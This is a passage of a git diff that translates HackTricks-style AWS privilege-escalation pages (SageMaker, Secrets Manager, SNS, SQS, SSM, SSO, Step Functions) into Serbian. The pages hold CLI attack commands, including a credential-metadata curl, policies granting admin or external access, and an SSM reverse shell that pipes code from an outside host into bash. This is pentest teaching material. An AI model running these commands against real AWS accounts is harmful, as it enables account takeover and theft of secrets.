+--stopping-condition '{"MaxRuntimeInSeconds": 600}'
 
 #To get the creds
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 ## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potencijalni Uticaj:** Privesc na sagemaker servisnu ulogu koja je navedena.
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
-&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+Napadač sa tim dozvolama će (potencijalno) moći da kreira **hyperparameter training job**, **pokreće proizvoljan kontejner** na njemu sa **priključenom ulogom**.\
+&#xNAN;_I nisam iskoristio zbog nedostatka vremena, ali izgleda slično prethodnim eksploatacijama, slobodno pošaljite PR sa detaljima eksploatacije._
 
-## References
+## Reference
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
index bdc01433b..e125c805d 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
@@ -4,7 +4,7 @@
 
 ## Secrets Manager
 
-For more info about secrets manager check:
+Za više informacija o secrets manageru pogledajte:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
@@ -12,44 +12,34 @@ For more info about secrets manager check:
 
 ### `secretsmanager:GetSecretValue`
 
-An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
-
+Napadač sa ovom dozvolom može dobiti **sačuvanu vrednost unutar tajne** u AWS **Secretsmanager**.
 ```bash
 aws secretsmanager get-secret-value --secret-id  # Get value
 ```
-
-**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+**Potencijalni uticaj:** Pristup visoko osetljivim podacima unutar AWS secrets manager servisa.
 
 ### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)
 
-With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
-
+Sa prethodnim dozvolama moguće je **dati pristup drugim principalima/računima (čak i spoljnim)** da pristupe **tajni**. Imajte na umu da da bi se **pročitali tajne šifrovane** KMS ključem, korisnik takođe mora imati **pristup KMS ključu** (više informacija na [KMS Enum stranici](../aws-services/aws-kms-enum.md)).
 ```bash
 aws secretsmanager list-secrets
 aws secretsmanager get-resource-policy --secret-id 
 aws secretsmanager put-resource-policy --secret-id  --resource-policy file:///tmp/policy.json
 ```
-
 policy.json:
-
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam:::root"
-      },
-      "Action": "secretsmanager:GetSecretValue",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": "secretsmanager:GetSecretValue",
+"Resource": "*"
+}
+]
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
index 699bb58cf..f85541bce 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
@@ -4,7 +4,7 @@
 
 ## SNS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
@@ -12,36 +12,26 @@ For more information check:
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+Napadač bi mogao poslati zlonamerne ili neželjene poruke na SNS temu, što bi moglo izazvati oštećenje podataka, pokretanje neželjenih akcija ili iscrpljivanje resursa.
 ```bash
 aws sns publish --topic-arn  --message 
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potencijalni uticaj**: Iskorišćavanje ranjivosti, oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
 
 ### `sns:Subscribe`
 
-An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
-
+Napadač bi mogao da se prijavi ili na SNS temu, potencijalno stičući neovlašćen pristup porukama ili ometajući normalno funkcionisanje aplikacija koje se oslanjaju na temu.
 ```bash
 aws sns subscribe --topic-arn  --protocol  --endpoint 
 ```
-
-**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic.
+**Potencijalni uticaj**: Neovlašćen pristup porukama (osetljive informacije), prekid usluge za aplikacije koje se oslanjaju na pogođenu temu.
 
 ### `sns:AddPermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
-
+Napadač bi mogao dodeliti neovlašćenim korisnicima ili uslugama pristup SNS temi, potencijalno dobijajući dalja ovlašćenja.
 ```css
 aws sns add-permission --topic-arn  --label  --aws-account-id  --action-name 
 ```
-
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+**Potencijalni uticaj**: Neovlašćen pristup temi, izlaganje poruka ili manipulacija temom od strane neovlašćenih korisnika ili servisa, ometanje normalnog funkcionisanja aplikacija koje se oslanjaju na temu.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
index 384ed8430..da1012961 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -4,7 +4,7 @@
 
 ## SQS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
@@ -12,39 +12,29 @@ For more information check:
 
 ### `sqs:AddPermission`
 
-An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
-
+Napadač bi mogao iskoristiti ovu dozvolu da dodeli neovlašćenim korisnicima ili servisima pristup SQS redu kreiranjem novih politika ili modifikovanjem postojećih politika. To bi moglo rezultirati neovlašćenim pristupom porukama u redu ili manipulacijom reda od strane neovlašćenih entiteta.
 ```bash
 cssCopy codeaws sqs add-permission --queue-url  --actions  --aws-account-ids  --label 
 ```
+**Potencijalni uticaj**: Neovlašćen pristup redu, izlaganje poruka ili manipulacija redom od strane neovlašćenih korisnika ili servisa.
 
-**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
-
-### `sqs:SendMessage` , `sqs:SendMessageBatch`
-
-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+### `sqs:SendMessage`, `sqs:SendMessageBatch`
 
+Napadač bi mogao poslati zlonamerne ili neželjene poruke u SQS red, što bi moglo izazvati oštećenje podataka, pokretanje neželjenih akcija ili iscrpljivanje resursa.
 ```bash
 aws sqs send-message --queue-url  --message-body 
 aws sqs send-message-batch --queue-url  --entries 
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potencijalni uticaj**: Iskorišćavanje ranjivosti, oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
-
+Napadač bi mogao da primi, obriše ili izmeni vidljivost poruka u SQS redu, uzrokujući gubitak poruka, oštećenje podataka ili prekid usluge za aplikacije koje se oslanjaju na te poruke.
 ```bash
 aws sqs receive-message --queue-url 
 aws sqs delete-message --queue-url  --receipt-handle 
 aws sqs change-message-visibility --queue-url  --receipt-handle  --visibility-timeout 
 ```
-
-**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+**Potencijalni uticaj**: Ukrasti osetljive informacije, gubitak poruka, oštećenje podataka i prekid usluge za aplikacije koje se oslanjaju na pogođene poruke.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
index c4067e2ca..9d3a51633 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
@@ -4,7 +4,7 @@
 
 ## SSM
 
-For more info about SSM check:
+Za više informacija o SSM proverite:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,8 +12,7 @@ For more info about SSM check:
 
 ### `ssm:SendCommand`
 
-An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
-
+Napadač sa dozvolom **`ssm:SendCommand`** može **izvršavati komande u instancama** koje pokreću Amazon SSM Agent i **kompromitovati IAM ulogu** koja se izvršava unutar nje.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -21,26 +20,22 @@ aws ssm describe-sessions --state Active
 
 # Send rev shell command
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
-   --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
+--document-name "AWS-RunShellScript" --output text \
+--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
 ```
-
-In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with:
-
+U slučaju da koristite ovu tehniku za eskalaciju privilegija unutar već kompromitovane EC2 instance, možete jednostavno uhvatiti rev shell lokalno sa:
 ```bash
 # If you are in the machine you can capture the reverseshel inside of it
 nc -lvnp 4444 #Inside the EC2 instance
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
-   --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
+--document-name "AWS-RunShellScript" --output text \
+--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potencijalni uticaj:** Direktno privesc na EC2 IAM uloge povezane sa aktivnim instancama sa SSM agentima.
 
 ### `ssm:StartSession`
 
-An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
-
+Napadač sa dozvolom **`ssm:StartSession`** može **pokrenuti SSH sličnu sesiju u instancama** koje pokreću Amazon SSM Agent i **kompromitovati IAM ulogu** koja se izvršava unutar nje.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -49,68 +44,58 @@ aws ssm describe-sessions --state Active
 # Send rev shell command
 aws ssm start-session --target "$INSTANCE_ID"
 ```
-
 > [!CAUTION]
-> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+> Da biste započeli sesiju, potrebno je da imate instaliran **SessionManagerPlugin**: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potencijalni uticaj:** Direktno privesc do EC2 IAM uloga povezanih sa aktivnim instancama sa SSM Agentima.
 
-#### Privesc to ECS
-
-When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\
-According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\
-Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running:
+#### Privesc do ECS
 
+Kada **ECS zadaci** rade sa **`ExecuteCommand` omogućenim**, korisnici sa dovoljno dozvola mogu koristiti `ecs execute-command` da **izvrše komandu** unutar kontejnera.\
+Prema [**dokumentaciji**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/), to se postiže kreiranjem sigurnog kanala između uređaja koji koristite za iniciranje komande “_exec_” i ciljnog kontejnera sa SSM Session Managerom. (SSM Session Manager Plugin je neophodan za ovo)\
+Stoga, korisnici sa `ssm:StartSession` moći će da **dobiju shell unutar ECS zadataka** sa tom opcijom omogućenom jednostavno pokretanjem:
 ```bash
 aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
 ```
-
 ![](<../../../images/image (185).png>)
 
-**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled.
+**Potencijalni uticaj:** Direktno privesc na `ECS` IAM uloge povezane sa aktivnim zadacima sa omogućenom `ExecuteCommand`.
 
 ### `ssm:ResumeSession`
 
-An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it.
-
+Napadač sa dozvolom **`ssm:ResumeSession`** može ponovo **pokrenuti SSH sličnu sesiju u instancama** koje pokreću Amazon SSM Agent sa **isključenim** stanjem SSM sesije i **kompromitovati IAM ulogu** koja se izvršava unutar nje.
 ```bash
 # Check for configured instances
 aws ssm describe-sessions
 
 # Get resume data (you will probably need to do something else with this info to connect)
 aws ssm resume-session \
-    --session-id Mary-Major-07a16060613c408b5
+--session-id Mary-Major-07a16060613c408b5
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.
+**Potencijalni uticaj:** Direktno privesc do EC2 IAM uloga povezanih sa aktivnim instancama sa SSM agentima i disconected sesijama.
 
 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
 
-An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys.
-
+Napadač sa pomenutim dozvolama će moći da prikaže **SSM parametre** i **pročita ih u čistom tekstu**. U ovim parametrima često možete **pronaći osetljive informacije** kao što su SSH ključevi ili API ključevi.
 ```bash
 aws ssm describe-parameters
 # Suppose that you found a parameter called "id_rsa"
 aws ssm get-parameters --names id_rsa --with-decryption
 aws ssm get-parameter --name id_rsa --with-decryption
 ```
-
-**Potential Impact:** Find sensitive information inside the parameters.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar parametara.
 
 ### `ssm:ListCommands`
 
-An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them.
-
+Napadač sa ovom dozvolom može da prikaže sve **komande** koje su poslate i nada se da će pronaći **osetljive informacije** u njima.
 ```
 aws ssm list-commands
 ```
-
-**Potential Impact:** Find sensitive information inside the command lines.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar komandnih linija.
 
 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
 
-An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it.
-
+Napadač sa ovim dozvolama može da prikaže sve **komande** poslate i **pročita izlaz** generisan, nadajući se da će pronaći **osetljive informacije** u njemu.
 ```bash
 # You can use any of both options to get the command-id and instance id
 aws ssm list-commands
@@ -118,19 +103,14 @@ aws ssm list-command-invocations
 
 aws ssm get-command-invocation --command-id  --instance-id 
 ```
-
-**Potential Impact:** Find sensitive information inside the output of the command lines.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar izlaza komandnih linija.
 
 ### Codebuild
 
-You can also use SSM to get inside a codebuild project being built:
+Možete takođe koristiti SSM da uđete u projekat codebuild koji se gradi:
 
 {{#ref}}
 aws-codebuild-privesc.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
index 0fb4e10a1..b8e499bfc 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
@@ -4,58 +4,53 @@
 
 ## AWS Identity Center / AWS SSO
 
-For more information about AWS Identity Center / AWS SSO check:
+Za više informacija o AWS Identity Center / AWS SSO pogledajte:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
 > [!WARNING]
-> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
-> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
-> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
+> Imajte na umu da po **default-u**, samo **korisnici** sa dozvolama **iz** **Upravljačkog Naloga** mogu pristupiti i **kontrolisati IAM Identity Center**.\
+> Korisnici iz drugih naloga mogu to omogućiti samo ako je nalog **Delegirani Administrator.**\
+> [Pogledajte dokumentaciju za više informacija.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
 
-### ~~Reset Password~~
+### ~~Resetuj lozinku~~
 
-An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
+Lako rešenje za eskalaciju privilegija u ovakvim slučajevima bi bilo imati dozvolu koja omogućava resetovanje lozinki korisnika. Nažalost, moguće je samo poslati email korisniku da resetuje svoju lozinku, tako da bi vam bio potreban pristup korisnikovom emailu.
 
 ### `identitystore:CreateGroupMembership`
 
-With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
-
+Sa ovom dozvolom moguće je postaviti korisnika unutar grupe tako da će naslediti sve dozvole koje grupa ima.
 ```bash
 aws identitystore create-group-membership --identity-store-id  --group-id  --member-id UserId=
 ```
-
 ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
-
+Napadač sa ovom dozvolom mogao bi dodeliti dodatne dozvole skupu dozvola koji je dodeljen korisniku pod njegovom kontrolom.
 ```bash
 # Set an inline policy with admin privileges
 aws sso-admin put-inline-policy-to-permission-set --instance-arn  --permission-set-arn  --inline-policy file:///tmp/policy.yaml
 
 # Content of /tmp/policy.yaml
 {
-	"Version": "2012-10-17",
-	"Statement": [
-		{
-			"Sid": "Statement1",
-			"Effect": "Allow",
-			"Action": ["*"],
-			"Resource": ["*"]
-		}
-	]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Statement1",
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": ["*"]
+}
+]
 }
 
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn  --permission-set-arn  --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
-
+Napadač sa ovom dozvolom mogao bi dodeliti dodatne dozvole skupu dozvola koji je dodeljen korisniku pod njegovom kontrolom.
 ```bash
 # Set AdministratorAccess policy to the permission set
 aws sso-admin attach-managed-policy-to-permission-set --instance-arn  --permission-set-arn  --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
@@ -63,14 +58,12 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn  --permission-set-arn  --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
+Napadač sa ovom dozvolom može dodeliti dodatne dozvole skupu dozvola koji je dodeljen korisniku pod njegovom kontrolom.
 
 > [!WARNING]
-> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected.
-
+> Da biste zloupotrebili ove dozvole u ovom slučaju, morate znati **ime korisničke upravljane politike koja se nalazi u SVIH računa** koji će biti pogođeni.
 ```bash
 # Set AdministratorAccess policy to the permission set
 aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn  --permission-set-arn  --customer-managed-policy-reference 
@@ -78,59 +71,42 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn  --permission-set-arn  --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:CreateAccountAssignment`
 
-An attacker with this permission could give a Permission Set to a user under his control to an account.
-
+Napadač sa ovom dozvolom mogao bi dodeliti Permission Set korisniku pod njegovom kontrolom za nalog.
 ```bash
 aws sso-admin create-account-assignment --instance-arn  --target-id  --target-type AWS_ACCOUNT --permission-set-arn  --principal-type USER --principal-id 
 ```
-
 ### `sso:GetRoleCredentials`
 
-Returns the STS short-term credentials for a given role name that is assigned to the user.
-
+Vraća STS kratkoročne akreditive za dato ime uloge koja je dodeljena korisniku.
 ```
 aws sso get-role-credentials --role-name  --account-id  --access-token 
 ```
-
-However, you need an access token that I'm not sure how to get (TODO).
+Međutim, potrebna vam je pristupna oznaka koju nisam siguran kako da dobijem (TODO).
 
 ### `sso:DetachManagedPolicyFromPermissionSet`
 
-An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
-
+Napadač sa ovom dozvolom može ukloniti asocijaciju između AWS upravljane politike i specificiranog skupa dozvola. Moguće je dodeliti više privilegija putem **uklanjanja upravljane politike (politika odbijanja)**.
 ```bash
 aws sso-admin detach-managed-policy-from-permission-set --instance-arn  --permission-set-arn  --managed-policy-arn 
 ```
-
 ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`
 
-An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
-
+Napadač sa ovom dozvolom može ukloniti asocijaciju između korisničke upravljane politike i određenog skupa dozvola. Moguće je dodeliti više privilegija putem **uklanjanja upravljane politike (politika odbijanja)**.
 ```bash
 aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn  --permission-set-arn  --customer-managed-policy-reference 
 ```
-
 ### `sso:DeleteInlinePolicyFromPermissionSet`
 
-An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**.
-
+Napadač sa ovom dozvolom može ukloniti dozvole iz inline politike iz skupa dozvola. Moguće je dodeliti **više privilegija putem odvajanja inline politike (politika odbijanja)**.
 ```bash
 aws sso-admin delete-inline-policy-from-permission-set --instance-arn  --permission-set-arn 
 ```
-
 ### `sso:DeletePermissionBoundaryFromPermissionSet`
 
-An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary.
-
+Napadač sa ovom dozvolom može ukloniti Permission Boundary iz skupa dozvola. Moguće je dodeliti **više privilegija uklanjanjem ograničenja na Permission Set** datom iz Permission Boundary.
 ```bash
 aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn  --permission-set-arn 
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
index bfc3adb77..6913370fe 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -4,7 +4,7 @@
 
 ## Step Functions
 
-For more information about this AWS service, check:
+Za više informacija o ovoj AWS usluzi, proverite:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
@@ -12,65 +12,58 @@ For more information about this AWS service, check:
 
 ### Task Resources
 
-These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions.
+Ove tehnike eskalacije privilegija će zahtevati korišćenje nekih AWS resursa step funkcija kako bi se izvršile željene akcije eskalacije privilegija.
 
-In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in:
+Da biste proverili sve moguće akcije, možete otići na svoj AWS nalog, odabrati akciju koju želite da koristite i videti parametre koje koristi, kao u:
 
 

 
-Or you could also go to the API AWS documentation and check each action docs:
+Ili možete otići na API AWS dokumentaciju i proveriti dokumentaciju za svaku akciju:
 
 - [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)
 - [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
 
 ### `states:TestState` & `iam:PassRole`
 
-An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.
-
+Napadač sa **`states:TestState`** & **`iam:PassRole`** dozvolama može testirati bilo koju državu i proslediti bilo koju IAM ulogu bez kreiranja ili ažuriranja postojeće mašine stanja, omogućavajući neovlašćen pristup drugim AWS uslugama sa dozvolama uloga. U kombinaciji, ove dozvole mogu dovesti do opsežnih neovlašćenih akcija, od manipulacije radnim tokovima do izmene podataka, do curenja podataka, manipulacije resursima i eskalacije privilegija.
 ```bash
 aws states test-state --definition  --role-arn  [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets]
 ```
-
-The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:
+Следећи примери показују како тестирати стање које креира приступни кључ за **`admin`** корисника користећи ове дозволе и дозволу у AWS окружењу. Ова дозвола би требало да има било коју политику са високим привилегијама повезану са њом (на пример **`arn:aws:iam::aws:policy/AdministratorAccess`**) која омогућава стању да изврши акцију **`iam:CreateAccessKey`**:
 
 - **stateDefinition.json**:
-
 ```json
 {
-  "Type": "Task",
-  "Parameters": {
-    "UserName": "admin"
-  },
-  "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
-  "End": true
+"Type": "Task",
+"Parameters": {
+"UserName": "admin"
+},
+"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+"End": true
 }
 ```
-
-- **Command** executed to perform the privesc:
-
+- **Команда** извршена за извођење преласка привилегија:
 ```bash
 aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole
 
 {
-  "output": "{
-	  \"AccessKey\":{
-		  \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
-		  \"CreateDate\":\"2024-07-09T16:59:11Z\",
-		  \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
-		  \"Status\":\"Active\",
-		  \"UserName\":\"admin\"
-	  }
-  }",
-	"status": "SUCCEEDED"
+"output": "{
+\"AccessKey\":{
+\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
+\"CreateDate\":\"2024-07-09T16:59:11Z\",
+\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
+\"Status\":\"Active\",
+\"UserName\":\"admin\"
+}
+}",
+"status": "SUCCEEDED"
 }
 ```
-
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potencijalni uticaj**: Neovlašćeno izvršavanje i manipulacija radnim tokovima i pristup osetljivim resursima, što može dovesti do značajnih bezbednosnih propusta.
 
 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
 
